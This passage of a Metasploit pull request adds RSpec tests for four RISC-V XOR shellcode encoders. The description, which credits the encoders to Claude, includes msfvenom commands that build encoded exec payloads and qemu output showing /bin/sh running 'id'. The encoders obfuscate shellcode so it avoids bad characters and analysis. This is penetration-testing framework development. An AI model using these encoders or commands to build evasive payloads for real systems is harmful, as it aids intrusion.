-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is empty' do
       it 'raises EncodingError' do
         state = make_encoder_state(''.b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is not 4-byte aligned' do
       it 'raises EncodingError' do
         state = make_encoder_state(('A' * 5).b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload exceeds 2047 dwords' do
       it 'raises EncodingError' do
         state = make_encoder_state(('A' * 4 * 2048).b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 

--- a/spec/modules/encoders/riscv_xor_encoder_examples.rb
+++ b/spec/modules/encoders/riscv_xor_encoder_examples.rb
@@ -1,0 +1,330 @@
+# Shared examples for RISC-V XOR encoder modules.
+# Each shared example group accepts the encoder reference name as a parameter.
+
+def make_encoder_state(buf, badchars = ''.b, key = 0xdeadbeef)
+  state = Msf::EncoderState.new(key)
+  state.buf = buf
+  state.badchars = badchars
+  state
+end
+
+RSpec.shared_examples 'riscv byte_xori encoder' do |ref_name|
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:encoder) { load_and_create_module(module_type: 'encoder', reference_name: ref_name) }
+  let(:valid_payload) { ("\xde\xad\xbe\xef" * 4).b }
+
+  describe '#decoder_stub' do
+    context 'when badchars include a null byte' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(valid_payload, "\x00".b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is empty' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(''.b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload exceeds 2047 bytes' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(('A' * 2048).b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'with a valid payload' do
+      subject(:stub) { encoder.decoder_stub(make_encoder_state(valid_payload)) }
+
+      it 'returns a 64-byte stub' do
+        expect(stub.bytesize).to eq(64)
+      end
+
+      it 'is binary encoded' do
+        expect(stub.encoding).to eq(Encoding::ASCII_8BIT)
+      end
+
+      it 'begins with auipc t0, 0 (0x00000297)' do
+        expect(stub[0, 4].unpack1('V')).to eq(0x00000297)
+      end
+
+      it 'ends with jalr x0, t4, 0' do
+        # jalr rd=0, rs1=29(t4), imm=0 => (0<<20)|(29<<15)|(0<<7)|0b1100111
+        expected_jalr = (29 << 15) | 0b1100111
+        expect(stub[-4, 4].unpack1('V')).to eq(expected_jalr)
+      end
+
+      it 'contains no null bytes in the first instruction' do
+        expect(stub[0, 4]).not_to include("\x00".b)
+      end
+    end
+  end
+
+  describe '#find_key_verify' do
+    it 'accepts a key that produces valid xori encoding' do
+      key_bytes = [0x01].pack('C')
+      result = encoder.find_key_verify(valid_payload, key_bytes, ''.b)
+      expect(result).to be(true).or be(false)
+    end
+
+    it 'rejects a key whose xori instruction encoding hits a bad character' do
+      bad_byte = "\x13".b
+      key_bytes = [0x00].pack('C')
+      # Force a state where 0x13 is a badchar — the addi/xori opcodes end in 0x13
+      result = encoder.find_key_verify(valid_payload, key_bytes, bad_byte)
+      expect(result).to be(false)
+    end
+  end
+end
+
+RSpec.shared_examples 'riscv longxor encoder' do |ref_name|
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:encoder) { load_and_create_module(module_type: 'encoder', reference_name: ref_name) }
+  let(:valid_payload) { ("\xde\xad\xbe\xef" * 4).b }   # 16 bytes, 4-dword aligned
+  let(:stub_insn_size) { 68 }                            # 17 instructions × 4 bytes
+  let(:stub_total_size) { 72 }                           # stub + 4-byte key placeholder
+
+  describe '#decoder_stub' do
+    context 'when badchars include a null byte' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(valid_payload, "\x00".b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is empty' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(''.b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is not 4-byte aligned' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(('A' * 5).b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload exceeds 2047 dwords' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(('A' * 4 * 2048).b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'with a valid aligned payload' do
+      let(:state) { make_encoder_state(valid_payload) }
+
+      subject(:stub) { encoder.decoder_stub(state) }
+
+      it 'returns the correct total size' do
+        expect(stub.bytesize).to eq(stub_total_size)
+      end
+
+      it 'is binary encoded' do
+        expect(stub.encoding).to eq(Encoding::ASCII_8BIT)
+      end
+
+      it 'begins with auipc t0, 0 (0x00000297)' do
+        expect(stub[0, 4].unpack1('V')).to eq(0x00000297)
+      end
+
+      it 'ends with 4 null bytes (key placeholder)' do
+        expect(stub[-4, 4]).to eq("\x00\x00\x00\x00".b)
+      end
+
+      it 'sets decoder_key_offset to the instruction section length' do
+        stub
+        expect(state.decoder_key_offset).to eq(stub_insn_size)
+      end
+    end
+  end
+end
+
+RSpec.shared_examples 'riscv longxor_tag encoder' do |ref_name|
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:encoder) { load_and_create_module(module_type: 'encoder', reference_name: ref_name) }
+  let(:valid_payload) { ("\xde\xad\xbe\xef" * 4).b }
+  let(:stub_insn_size) { 60 }   # 15 instructions × 4 bytes
+  let(:stub_total_size) { 64 }  # stub + 4-byte key placeholder
+
+  describe '#decoder_stub' do
+    context 'when badchars include a null byte' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(valid_payload, "\x00".b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is empty' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(''.b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is not 4-byte aligned' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(('A' * 5).b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload contains a zero dword' do
+      it 'raises EncodingError' do
+        payload_with_zero = ("\xde\xad\xbe\xef" + "\x00\x00\x00\x00" + "\xde\xad\xbe\xef" * 2).b
+        state = make_encoder_state(payload_with_zero)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError, /zero dword/)
+      end
+    end
+
+    context 'with a valid aligned payload containing no zero dwords' do
+      let(:state) { make_encoder_state(valid_payload) }
+
+      subject(:stub) { encoder.decoder_stub(state) }
+
+      it 'returns the correct total size' do
+        expect(stub.bytesize).to eq(stub_total_size)
+      end
+
+      it 'is binary encoded' do
+        expect(stub.encoding).to eq(Encoding::ASCII_8BIT)
+      end
+
+      it 'begins with auipc t0, 0 (0x00000297)' do
+        expect(stub[0, 4].unpack1('V')).to eq(0x00000297)
+      end
+
+      it 'ends with 4 null bytes (key placeholder)' do
+        expect(stub[-4, 4]).to eq("\x00\x00\x00\x00".b)
+      end
+
+      it 'sets decoder_key_offset to the instruction section length' do
+        stub
+        expect(state.decoder_key_offset).to eq(stub_insn_size)
+      end
+    end
+  end
+
+  describe '#encode_end' do
+    it 'appends the XOR key to the encoded buffer' do
+      key = 0xcafebabe
+      state = make_encoder_state(valid_payload, ''.b, key)
+      state.encoded = ''.b
+      encoder.encode_end(state)
+      expect(state.encoded).to eq([key].pack('V'))
+    end
+
+    it 'appends key ^ key == 0 as the sentinel dword' do
+      key = 0x12345678
+      state = make_encoder_state(valid_payload, ''.b, key)
+      state.encoded = ''.b
+      encoder.encode_end(state)
+      sentinel = state.encoded.unpack1('V')
+      expect(sentinel ^ key).to eq(0)
+    end
+  end
+end
+
+RSpec.shared_examples 'riscv longxor_feedback encoder' do |ref_name|
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:encoder) { load_and_create_module(module_type: 'encoder', reference_name: ref_name) }
+  let(:valid_payload) { ("\xde\xad\xbe\xef" * 4).b }
+  let(:stub_insn_size) { 72 }   # 18 instructions × 4 bytes
+  let(:stub_total_size) { 76 }  # stub + 4-byte key placeholder
+
+  describe '#decoder_stub' do
+    context 'when badchars include a null byte' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(valid_payload, "\x00".b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is empty' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(''.b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload is not 4-byte aligned' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(('A' * 5).b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'when payload exceeds 2047 dwords' do
+      it 'raises EncodingError' do
+        state = make_encoder_state(('A' * 4 * 2048).b)
+        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+      end
+    end
+
+    context 'with a valid aligned payload' do
+      let(:state) { make_encoder_state(valid_payload) }
+
+      subject(:stub) { encoder.decoder_stub(state) }
+
+      it 'returns the correct total size' do
+        expect(stub.bytesize).to eq(stub_total_size)
+      end
+
+      it 'is binary encoded' do
+        expect(stub.encoding).to eq(Encoding::ASCII_8BIT)
+      end
+
+      it 'begins with auipc t0, 0 (0x00000297)' do
+        expect(stub[0, 4].unpack1('V')).to eq(0x00000297)
+      end
+
+      it 'ends with 4 null bytes (key placeholder)' do
+        expect(stub[-4, 4]).to eq("\x00\x00\x00\x00".b)
+      end
+
+      it 'sets decoder_key_offset to the instruction section length' do
+        stub
+        expect(state.decoder_key_offset).to eq(stub_insn_size)
+      end
+    end
+  end
+
+  describe '#encode_begin' do
+    it 'seeds the feedback register with the initial key' do
+      state = make_encoder_state(valid_payload, ''.b, 0xdeadbeef)
+      encoder.encode_begin(state)
+      expect(encoder.instance_variable_get(:@feedback)).to eq(0xdeadbeef)
+    end
+  end
+
+  describe '#encode_block' do
+    before { encoder.encode_begin(make_encoder_state(valid_payload, ''.b, 0x11111111)) }
+
+    it 'XORs the first block with the initial key' do
+      state = make_encoder_state(valid_payload, ''.b, 0x11111111)
+      encoder.encode_begin(state)
+      block = "\xef\xbe\xad\xde".b
+      result = encoder.encode_block(state, block)
+      plain = block.unpack1('V')
+      expect(result.unpack1('V')).to eq(plain ^ 0x11111111)
+    end
+
+    it 'uses the previous encoded dword as feedback for the next block' do
+      state = make_encoder_state(valid_payload, ''.b, 0x11111111)
+      encoder.encode_begin(state)
+      block1 = "\x01\x00\x00\x00".b
+      block2 = "\x02\x00\x00\x00".b
+      encoded1 = encoder.encode_block(state, block1)
+      encoded2 = encoder.encode_block(state, block2)
+      expect(encoded2.unpack1('V')).to eq(block2.unpack1('V') ^ encoded1.unpack1('V'))
+    end
+  end
+end


### PR DESCRIPTION
Add four encoder variants for both RISC-V 32-bit and 64-bit
little-endian architectures:

- longxor: Dword XOR encoder with a 72-byte decoder stub. XORs the
  payload 4 bytes at a time using an R-type XOR instruction and a
  length-based loop counter.

- byte_xori: Byte XOR encoder with a 64-byte decoder stub. XORs one
  byte at a time using an I-type XORI instruction with the key
  embedded in the immediate field. Avoids the R-type XOR opcode byte
  (0x33), which can be useful when that byte is a badchar.

- longxor_tag: Tag-based dword XOR encoder with a 64-byte decoder
  stub. Uses a sentinel value instead of a length counter to detect
  end-of-payload. Rejects payloads containing aligned zero dwords
  that would collide with the sentinel.

- longxor_feedback: Dword XOR encoder with cipher feedback and a
  76-byte decoder stub. Each dword is XORed with the previous
  encoded dword rather than a static key, creating a chained
  dependency that makes the output more resistant to frequency
  analysis.

All four encoders use only RV32I/RV64I base integer instructions and
Linux syscall 259 (riscv_flush_icache) to flush the instruction cache
after decoding.

---

These are the first encoders for the RISC-V architecture in the
framework, enabling bad character avoidance for RISC-V payloads.
Unfortunately, 0x00 is unavoidable.

They were written entirely by Claude. Claude one-shotted them.
When asked about reliability and portability, it suggested implementing
a guard for a zero dword in the longxor encoder, which it implemented.


## Verification

```
msfvenom -p linux/riscv64le/exec CMD=id -e riscv64le/byte_xori -f elf -o byte_xori-test64 && chmod +x byte_xori-test64
msfvenom -p linux/riscv64le/exec CMD=id -e riscv64le/longxor -f elf -o longxor-test64 && chmod +x longxor-test64
msfvenom -p linux/riscv64le/exec CMD=id -e riscv64le/longxor_tag -f elf -o longxor_tag-test64 && chmod +x longxor_tag-test64
msfvenom -p linux/riscv64le/exec CMD=id -e riscv64le/longxor_feedback -f elf -o longxor_feedback64 && chmod +x longxor_feedback64
msfvenom -p linux/riscv32le/exec CMD=id -e riscv32le/byte_xori -f elf -o byte_xori-test32 && chmod +x byte_xori-test32
msfvenom -p linux/riscv32le/exec CMD=id -e riscv32le/longxor -f elf -o longxor-test32 && chmod +x longxor-test32
msfvenom -p linux/riscv32le/exec CMD=id -e riscv32le/longxor_tag -f elf -o longxor_tag-test32 && chmod +x longxor_tag-test32
msfvenom -p linux/riscv32le/exec CMD=id -e riscv32le/longxor_feedback -f elf -o longxor_feedback32 && chmod +x longxor_feedback32
```

```
$ /home/user/qemu/build/qemu-riscv64 -strace byte_xori-test64
2644253 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv64 -strace longxor-test64
2644348 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv64 -strace longxor_tag-test64
2644440 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv64 -strace longxor_feedback64 
2668101 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv32 -strace byte_xori-test32
2644135 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv32 -strace ./longxor_tag-test32 
2633438 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv32 -strace longxor-test32
2634177 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```

```
$ /home/user/qemu/build/qemu-riscv32 -strace longxor_feedback32
2668473 execve("/bin/sh",{"/bin/sh","-c","id",NULL})uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt),145(docker)
```